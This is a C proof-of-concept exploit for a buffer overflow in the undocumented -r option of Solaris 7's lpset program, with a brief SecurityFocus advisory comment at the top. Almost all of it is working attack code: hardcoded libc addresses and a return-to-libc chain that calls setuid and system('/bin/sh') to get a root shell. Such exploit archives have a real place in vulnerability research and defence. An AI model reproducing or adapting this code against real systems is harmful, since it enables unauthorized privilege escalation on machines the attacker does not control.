/*
source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
*/
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
int *p, i;
memset(expbuf, 'a', BUFSIZE);
p = (int *)(expbuf + BUFSIZE);
*p++ = STACK;
*p++ = SCANF + 1;
*p++ = STACK + 6 * 4;
*p++ = POP2;
*p++ = PERCD;
*p++ = STACK + 9 * 4;
*p++ = STACK + 10 * 4;
*p++ = SETUID;
*p++ = POP1;
*p++ = 0x33333333;
*p++ = STACK + 15 * 4;
*p++ = SYSTEM;
*p++ = 0x33333333;
*p++ = BINSH;
*p = 0;
env[0] = 0;
execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
env);
return 0;
}